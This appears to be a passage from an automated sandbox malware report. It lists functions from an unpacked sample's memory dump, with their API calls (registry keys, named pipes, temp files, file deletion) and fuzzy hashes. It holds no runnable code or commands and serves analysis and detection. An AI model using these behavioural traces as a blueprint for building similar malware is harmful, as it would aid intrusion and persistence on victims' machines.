Instruction Fuzzy Hash: EF417EB9A00259EFDF00EFA8D884D997BECEB9A305B14486AE504D7340F738ED498F50

Uniqueness

Uniqueness Score: -1.00%

Function 0462EA0F, Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 046238C5: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0462390A
Part of subcall function 046238C5: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04623922
Part of subcall function 046238C5: WaitForSingleObject.KERNEL32(00000000), ref: 046239EA
Part of subcall function 046238C5: HeapFree.KERNEL32(00000000,?), ref: 04623A13
Part of subcall function 046238C5: HeapFree.KERNEL32(00000000,?), ref: 04623A23
Part of subcall function 046238C5: RegCloseKey.ADVAPI32(?), ref: 04623A2C

lstrcmp.KERNEL32(?,00000000), ref: 0462EA86
HeapFree.KERNEL32(00000000,00000000,?,73BCF730,00000000), ref: 0462EAB2
GetCurrentThreadId.KERNEL32 ref: 0462EB63
GetCurrentThread.KERNEL32 ref: 0462EB74
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,73BCF730,00000000), ref: 0462EBB1
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,73BCF730,00000000), ref: 0462EBC5
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0462EBD3
wsprintfA.USER32 ref: 0462EBEB

Part of subcall function 04627713: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,0462FBDF,00000000,00000000,00000000,73B75520,00000000,?,0462ECDD,00000020,00000000,?,00000000), ref: 0462771D
Part of subcall function 04627713: lstrcpy.KERNEL32(00000000,00000000), ref: 04627741
Part of subcall function 04627713: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0462ECDD,00000020,00000000,?,00000000,?,00000000,00000000), ref: 04627748
Part of subcall function 04627713: lstrcat.KERNEL32(00000000,?), ref: 0462779F

lstrlen.KERNEL32(00000000,00000000), ref: 0462EBF6
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0462EC0D
HeapFree.KERNEL32(00000000,00000000), ref: 0462EC1E
HeapFree.KERNEL32(00000000,?), ref: 0462EC2A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID:
API String ID: 773763258-0
Opcode ID: 49d5ac07dc202810672d2b11bd406be0523e5b728c6bcaa6b7648b332387df3a
Instruction ID: f686d68f73b6d830a9887bbb6b843a788610e5c901a229fdc3126b60cbb5382c
Opcode Fuzzy Hash: 49d5ac07dc202810672d2b11bd406be0523e5b728c6bcaa6b7648b332387df3a
Instruction Fuzzy Hash: E6712279900629FFCF11DFA4D984EAEBBB9FB58311F008069E505A7210E735AA41DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04638888, Relevance: 18.2, APIs: 12, Instructions: 182synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 046388AF
memcpy.NTDLL(?,?,00000010), ref: 046388D2
memset.NTDLL ref: 0463891E
lstrcpyn.KERNEL32(?,?,00000034), ref: 04638932
GetLastError.KERNEL32 ref: 0463895D
GetLastError.KERNEL32 ref: 046389A4
GetLastError.KERNEL32 ref: 046389C3
WaitForSingleObject.KERNEL32(?,000927C0), ref: 046389FD
WaitForSingleObject.KERNEL32(?,00000000), ref: 04638A0B
GetLastError.KERNEL32 ref: 04638A85
ReleaseMutex.KERNEL32(?), ref: 04638A97
RtlExitUserThread.NTDLL(?), ref: 04638AAD

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 33085af2dfe0e52a06450288e2ec525b4d4d272a0bf1ab05347eb257a20570de
Instruction ID: 6e79fd72568b417582eca818ea23066f5f93b8b0e741d7e6daa1fa537409f9db
Opcode Fuzzy Hash: 33085af2dfe0e52a06450288e2ec525b4d4d272a0bf1ab05347eb257a20570de
Instruction Fuzzy Hash: A0617B71504780AFD721AF65C848A6BBBE8FF94722F008A1DF59693280FB75E905CF52

Uniqueness

Uniqueness Score: -1.00%

Function 04624971, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,73B75520,?,00000000,00000000,?,?), ref: 04624987
lstrlen.KERNEL32(?), ref: 0462498F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0462499F
lstrcpy.KERNEL32(00000000,?), ref: 046249BE
lstrlen.KERNEL32(?), ref: 046249D3
lstrlen.KERNEL32(?), ref: 046249E1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 04624A2F
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 04624A53
lstrlen.KERNEL32(?), ref: 04624A86
HeapFree.KERNEL32(00000000,?,?), ref: 04624AB1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 04624AC8
HeapFree.KERNEL32(00000000,?,?), ref: 04624AD5

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID:
API String ID: 904523553-0
Opcode ID: 91ab0d92f5a8af9670969e327401be2f20e05e247a928fa6d9bf43a468197910
Instruction ID: eb7c91d402b24c7983b956f49dd2a39577ae99576bef7dce252a8fb678aa5950
Opcode Fuzzy Hash: 91ab0d92f5a8af9670969e327401be2f20e05e247a928fa6d9bf43a468197910
Instruction Fuzzy Hash: F9418A7690065ABFDF12CFA0CD44AAE7BBAFB95314F10402AE90197250EB34A911CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0463091E, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04630950
WaitForSingleObject.KERNEL32(000003B4,00000000), ref: 04630972
ConnectNamedPipe.KERNEL32(?,?), ref: 04630992
GetLastError.KERNEL32 ref: 0463099C
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046309C0
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 04630A03
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 04630A0C
WaitForSingleObject.KERNEL32(00000000), ref: 04630A15
CloseHandle.KERNEL32(?), ref: 04630A2A
GetLastError.KERNEL32 ref: 04630A37
CloseHandle.KERNEL32(?), ref: 04630A44
RtlExitUserThread.NTDLL(000000FF), ref: 04630A5A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: b0ffb383ab5d7f66a2a92f47a71d512d398b8e5346254a6eaf247d96a592588f
Instruction ID: 2571365dc3a3b29ec0e6f0713c70c66fa6283ae4d237954474d445486316b897
Opcode Fuzzy Hash: b0ffb383ab5d7f66a2a92f47a71d512d398b8e5346254a6eaf247d96a592588f
Instruction Fuzzy Hash: 1A31D374404385AFEB009F24DC89A6FBBA9FB88315F001A29F561D2190FB74ED49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0462EC42, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 0462EC6C
GetCurrentThreadId.KERNEL32 ref: 0462EC82
GetCurrentThread.KERNEL32 ref: 0462EC93

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

Part of subcall function 0462FBC3: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,73B75520,00000000,?,0462ECDD,00000020,00000000,?,00000000), ref: 0462FC2E
Part of subcall function 0462FBC3: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,73B75520,00000000,?,0462ECDD,00000020,00000000,?,00000000), ref: 0462FC56

HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0462ED0D
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0462ED19
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0462ED68
wsprintfA.USER32 ref: 0462ED80
lstrlen.KERNEL32(00000000,00000000), ref: 0462ED8B
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0462EDA2

Strings

W, xrefs: 0462ED55

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: W
API String ID: 630447368-655174618
Opcode ID: cbfa9ac257d1f80a4c02024ffac0b5317a4e4518bd3ea32c23e3283eb123f0d8
Instruction ID: 7d0694f9e08981c586ce3d67f306f7decc2b6768903e4a01de5b3c56cbe8ff5d
Opcode Fuzzy Hash: cbfa9ac257d1f80a4c02024ffac0b5317a4e4518bd3ea32c23e3283eb123f0d8
Instruction Fuzzy Hash: 28418B38900629FBCF119FA1DD48DAE7FB8FF94744B048426E40593250F739AA50DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0463D569, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 104memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000002C,7656D3B0,00000000,73B75520), ref: 0463D5BF
StrChrA.SHLWAPI(00000001,0000002C), ref: 0463D5D2
StrTrimA.SHLWAPI(00000000,20000920), ref: 0463D5F5
StrTrimA.SHLWAPI(00000001,20000920), ref: 0463D604
lstrlen.KERNEL32(?), ref: 0463D639
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0463D64C
lstrcpy.KERNEL32(00000004,?), ref: 0463D66A
HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 0463D68E

Strings

W, xrefs: 0463D5A4
U, xrefs: 0463D58A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: U$W
API String ID: 1974185407-2446397624
Opcode ID: e8aa1f71332ecfff5de639378ee542f1db3fd7fca7df1725f75f0809ad9d96c1
Instruction ID: 7833cc06b31c5432e975035df44e75321be11b2795159797e5d2669066db4e7a
Opcode Fuzzy Hash: e8aa1f71332ecfff5de639378ee542f1db3fd7fca7df1725f75f0809ad9d96c1
Instruction Fuzzy Hash: A731DE3AA00255AFCF11AFA8DC44E8A7FF8EF8A701F14505AE418D7291E778A901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04627A06, Relevance: 16.8, APIs: 11, Instructions: 343memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04627A7D
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04627A9C

Part of subcall function 04629FE2: wsprintfA.USER32 ref: 04629FF5
Part of subcall function 04629FE2: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0462A007
Part of subcall function 04629FE2: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0462A031
Part of subcall function 04629FE2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0462A044
Part of subcall function 04629FE2: CloseHandle.KERNEL32(?), ref: 0462A04D

GetLastError.KERNEL32 ref: 04627D6F
RtlEnterCriticalSection.NTDLL(?), ref: 04627D7F
RtlLeaveCriticalSection.NTDLL(?), ref: 04627D90
RtlExitUserThread.NTDLL(?), ref: 04627D9E
InterlockedExchange.KERNEL32(?,00000000), ref: 04627E12

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExchangeExitHandleInterlockedLastLeaveMultipleObjectsThreadUserWaitwsprintf
String ID:
API String ID: 3485492818-0
Opcode ID: b0f457bd7b622262742d6a2d319c8bda544df221bd629e15ed4c521f872034e4
Instruction ID: b0b1f911a282065decb3b350d1fcdb428ac58dfb575d5a95437f90532f1db674
Opcode Fuzzy Hash: b0f457bd7b622262742d6a2d319c8bda544df221bd629e15ed4c521f872034e4
Instruction Fuzzy Hash: BFD17DB560061AAFEB309F21DD84EAA7BA9FF58706F10492AF915D2250F730ED54CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04637CBC, Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,74666F53,00000000), ref: 04637CE7

Part of subcall function 0462F1EE: RegCloseKey.ADVAPI32(?,?,?,046394FE,00000000,00000000,00000000), ref: 0462F275

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 04637D22
lstrcpyW.KERNEL32(-00000002,?), ref: 04637D84
lstrcatW.KERNEL32(00000000,0065002E), ref: 04637D99
lstrcpyW.KERNEL32(?), ref: 04637DB3
lstrcatW.KERNEL32(00000000,0064002E), ref: 04637DC2

Part of subcall function 04621A4A: lstrlenW.KERNEL32(?), ref: 04621A5D
Part of subcall function 04621A4A: lstrlen.KERNEL32(?), ref: 04621A68
Part of subcall function 04621A4A: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 04621A7D

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 04637E2C

Part of subcall function 0463737F: lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,046269C1,00000000,00000000,04639952,00000000,00000000,7711DBB0,00000020,00000000), ref: 0463738B
Part of subcall function 0463737F: memcpy.NTDLL(00000000,00000000,00000000,00000106,?,?,046269C1,00000000,00000000,04639952,00000000,00000000,7711DBB0,00000020,00000000), ref: 046373B3
Part of subcall function 0463737F: memset.NTDLL ref: 046373C5

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 04637E61
GetLastError.KERNEL32 ref: 04637E6C
HeapFree.KERNEL32(00000000,00000000), ref: 04637E82
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 04637E94

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 1430934453-0
Opcode ID: efebe188f023d18549f0a7012214ca86a862fa1177c01ba24a00c27dc63de19f
Instruction ID: 3fa0358193665b3ac3523f0c2090e53d7abb78613cebd34e0b085adeb1652de8
Opcode Fuzzy Hash: efebe188f023d18549f0a7012214ca86a862fa1177c01ba24a00c27dc63de19f
Instruction Fuzzy Hash: 81515DBA50015AFFDF11AFA0DC44EAEBBB9FF95706B009465E900E7210F735AE119B60

Uniqueness

Uniqueness Score: -1.00%

Function 0463A105, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0463A13B
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0463A150
RegCreateKeyA.ADVAPI32(80000001,?), ref: 0463A178
HeapFree.KERNEL32(00000000,?), ref: 0463A1B9
HeapFree.KERNEL32(00000000,00000000), ref: 0463A1C9
RtlAllocateHeap.NTDLL(00000000,04624A18), ref: 0463A1DC
RtlAllocateHeap.NTDLL(00000000,04624A18), ref: 0463A1EB
HeapFree.KERNEL32(00000000,00000000,?,04624A18,00000000,?,?,?), ref: 0463A235
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,04624A18,00000000,?,?,?,?), ref: 0463A259
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04624A18,00000000,?,?,?), ref: 0463A27E
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04624A18,00000000,?,?,?), ref: 0463A293

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 759e9b0a105719cce115b2b964fe53cf52f3f4fd20402e9ab48af48443f307e0
Instruction ID: 263ca38c50283b9582d0a7fe65164d64f30c8b9060c5293c5d5bd03c416bc9c7
Opcode Fuzzy Hash: 759e9b0a105719cce115b2b964fe53cf52f3f4fd20402e9ab48af48443f307e0
Instruction Fuzzy Hash: 3851BFBAD00249EFDF11DFD4D8848EEBBB9FB58346B14446AE505A2220E3355E90EF60

Uniqueness

Uniqueness Score: -1.00%

Function 04625A8F, Relevance: 16.6, APIs: 11, Instructions: 119memorystringCOMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 04625AA9
PathFindFileNameW.SHLWAPI(?), ref: 04625ABF
lstrlenW.KERNEL32(00000000), ref: 04625B02
RtlAllocateHeap.NTDLL(00000000,0464251D), ref: 04625B18
memcpy.NTDLL(00000000,00000000,0464251B), ref: 04625B2B
_wcsupr.NTDLL ref: 04625B37
lstrlenW.KERNEL32(?), ref: 04625B6D
RtlAllocateHeap.NTDLL(00000000,?), ref: 04625B82
lstrcpyW.KERNEL32(00000000,?), ref: 04625B98
lstrcatW.KERNEL32(00000000,002D0020), ref: 04625BBE
HeapFree.KERNEL32(00000000,00000000), ref: 04625BCD

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID:
API String ID: 3868788785-0
Opcode ID: c343757603e2bb0e7e270f8b9f0803efa8ebe497101b83dbe9b056031badbc6c
Instruction ID: f424b0ca07ecfa1b0b120b1cb4e3b0b525d0a49203f62b6307d409a6dcc2ae9d
Opcode Fuzzy Hash: c343757603e2bb0e7e270f8b9f0803efa8ebe497101b83dbe9b056031badbc6c
Instruction Fuzzy Hash: 7731053A501B24FFCB30AF689D89A6F7BA8EB95712B140519F512C7281FB74AC408F55

Uniqueness

Uniqueness Score: -1.00%

Function 04627F3C, Relevance: 16.6, APIs: 11, Instructions: 95memoryregistrystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(22207C20), ref: 04627F4D
GetTempPathA.KERNEL32(00000000,00000000,?,?,0463C09F,00000094,00000000,00000000,22207C20), ref: 04627F65
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 04627F74
GetTempPathA.KERNEL32(00000001,00000000,?,?,0463C09F,00000094,00000000,00000000,22207C20), ref: 04627F87
GetTickCount.KERNEL32 ref: 04627F8B
wsprintfA.USER32 ref: 04627FA2
RegCreateKeyA.ADVAPI32(80000001,74666F53,22207C20), ref: 04627FDD
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 04627FFD
lstrlen.KERNEL32(00000000), ref: 04628007
RegCloseKey.ADVAPI32(?), ref: 04628023
HeapFree.KERNEL32(00000000,00000000,00000000,22207C20,00000000,00000000,00000001,00000000,22207C20), ref: 04628031

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
String ID:
API String ID: 1404517112-0
Opcode ID: 1aa396f58c2ed1e832a048a8efdb5ad914e31dfddd627cc6e7c6d107bc548672
Instruction ID: db3c1e8d10a025815d80771fb19a5fd20baa678320aef0d0f0e8705ef6e1a4f3
Opcode Fuzzy Hash: 1aa396f58c2ed1e832a048a8efdb5ad914e31dfddd627cc6e7c6d107bc548672
Instruction Fuzzy Hash: FC316B79401128FFDF10AFA0DC88EAB3BACEF85395B005016F90693200EB389E558FA0

Uniqueness

Uniqueness Score: -1.00%

Function 04626030, Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04626047
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0463C23B,00000094,00000000,00000001,00000094,00000000,00000000,22207C20,046241EA,00000000,00000094), ref: 04626059
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0463C23B,00000094,00000000,00000001,00000094,00000000,00000000,22207C20,046241EA,00000000,00000094), ref: 04626066
wsprintfA.USER32 ref: 04626081
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,22207C20,046241EA,00000000,00000094,00000000), ref: 04626097
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 046260B0
WriteFile.KERNEL32(00000000,00000000), ref: 046260B8
GetLastError.KERNEL32 ref: 046260C6
CloseHandle.KERNEL32(00000000), ref: 046260CF
GetLastError.KERNEL32(?,00000000,?,0463C23B,00000094,00000000,00000001,00000094,00000000,00000000,22207C20,046241EA,00000000,00000094,00000000), ref: 046260E0
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0463C23B,00000094,00000000,00000001,00000094,00000000,00000000,22207C20,046241EA,00000000,00000094), ref: 046260F0

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID:
API String ID: 3873609385-0
Opcode ID: 1a5de2e845967132b3e99f63da7f2994d3e5e4d787286666dedf25f45ada65e7
Instruction ID: f6d27d0212baaf20ba1e7cbeb2f9eab3a1842a509076e3df9b13e91fccf49e21
Opcode Fuzzy Hash: 1a5de2e845967132b3e99f63da7f2994d3e5e4d787286666dedf25f45ada65e7
Instruction Fuzzy Hash: 5111D5791416247FDB302B64ED4DF7B3A5CEB826A5B001025F907D2181FF685C55DA71

Uniqueness

Uniqueness Score: -1.00%

Function 0463D58E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000002C,7656D3B0,00000000,73B75520), ref: 0463D5BF
StrChrA.SHLWAPI(00000001,0000002C), ref: 0463D5D2
StrTrimA.SHLWAPI(00000000,20000920), ref: 0463D5F5
StrTrimA.SHLWAPI(00000001,20000920), ref: 0463D604
lstrlen.KERNEL32(?), ref: 0463D639
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0463D64C
lstrcpy.KERNEL32(00000004,?), ref: 0463D66A
HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 0463D68E

Strings

W, xrefs: 0463D5A4

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: W
API String ID: 1974185407-655174618
Opcode ID: c83c46d7bbd48379ef777efc4b6bfe87e9f0526763d9e139773cf39ebab568c5
Instruction ID: 29f1254742d6986de7adc6bb133c23f7c70aed7cbe909a17aefa49733b818ee2
Opcode Fuzzy Hash: c83c46d7bbd48379ef777efc4b6bfe87e9f0526763d9e139773cf39ebab568c5
Instruction Fuzzy Hash: 73319079A00245FFDF10AFA4DC44E9A7BB8EF99742F105056F81997250F774AD408B60

Uniqueness

Uniqueness Score: -1.00%

Function 04621284, Relevance: 15.2, APIs: 10, Instructions: 184stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05D3C988), ref: 046212A7
lstrlen.KERNEL32(?), ref: 046212B6
lstrlen.KERNEL32(?), ref: 046212C3
lstrlen.KERNEL32(00000000), ref: 046212DB
lstrlen.KERNEL32(?), ref: 046212E7
RtlAllocateHeap.NTDLL(00000000,?), ref: 04621303
wsprintfA.USER32 ref: 046213E5
memcpy.NTDLL(00000000,?,?), ref: 04621432
InterlockedExchange.KERNEL32(046480A8,00000000), ref: 0462144E
HeapFree.KERNEL32(00000000,00000000), ref: 0462148F

Part of subcall function 04638E62: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04638E8B
Part of subcall function 04638E62: memcpy.NTDLL(00000000,?,?), ref: 04638E9E
Part of subcall function 04638E62: RtlEnterCriticalSection.NTDLL(046483A8), ref: 04638EAF
Part of subcall function 04638E62: RtlLeaveCriticalSection.NTDLL(046483A8), ref: 04638EC4
Part of subcall function 04638E62: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04638EFC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID:
API String ID: 4198405257-0
Opcode ID: 1d3f2f0580effe02403d39b136e105817363c559a7120e7a410efb0ef13b8816
Instruction ID: 5394f946aecb21cc81a0feee13e5860a86df217d22e046e53af3569f0e57bda9
Opcode Fuzzy Hash: 1d3f2f0580effe02403d39b136e105817363c559a7120e7a410efb0ef13b8816
Instruction Fuzzy Hash: B1614975A0065AEFDF14DFA4CD84AEE3BA9EB96304F04812AE805D7240F774AA55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046394B7, Relevance: 15.1, APIs: 10, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,74666F53,?), ref: 046394DB

Part of subcall function 0462F1EE: RegCloseKey.ADVAPI32(?,?,?,046394FE,00000000,00000000,00000000), ref: 0462F275

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0463950A
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0463951B
RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 04639555
RegCloseKey.ADVAPI32(?), ref: 04639580
RtlEnterCriticalSection.NTDLL(00000000), ref: 04639596
HeapFree.KERNEL32(00000000,?), ref: 046395AB
RtlLeaveCriticalSection.NTDLL(00000000), ref: 046395BF
HeapFree.KERNEL32(00000000,?), ref: 046395D4
RegCloseKey.ADVAPI32(?), ref: 046395DD

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID:
API String ID: 4138089493-0
Opcode ID: 2755ad75118046dae29074585c3bb905fd265d22a5ba5c562ca71db368a600e2
Instruction ID: 2f66a27f228025c134c79758337ce9d1285a2d7a53e4a41d6d28c4a30bf6906d
Opcode Fuzzy Hash: 2755ad75118046dae29074585c3bb905fd265d22a5ba5c562ca71db368a600e2
Instruction Fuzzy Hash: 4C315779900108BFCF12AFA4DC88D9E7BB9EB89712B005065F605D3210F775AE94DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0463E895, Relevance: 15.1, APIs: 10, Instructions: 98filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04630216: memset.NTDLL ref: 04630238
Part of subcall function 04630216: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 046302E2

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0463E8DD
CloseHandle.KERNEL32(?), ref: 0463E8E9
PathFindFileNameW.SHLWAPI(?), ref: 0463E8F9
lstrlenW.KERNEL32(00000000), ref: 0463E902
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0463E913
wcstombs.NTDLL ref: 0463E922
lstrlen.KERNEL32(?), ref: 0463E92F
UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001), ref: 0463E96E
HeapFree.KERNEL32(00000000,00000000), ref: 0463E981
DeleteFileW.KERNEL32(?), ref: 0463E98E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 63183a576b7044f1cacf4cae8cbebf15c96bbcbd0a2f7b21cbed1c8c843a2f06
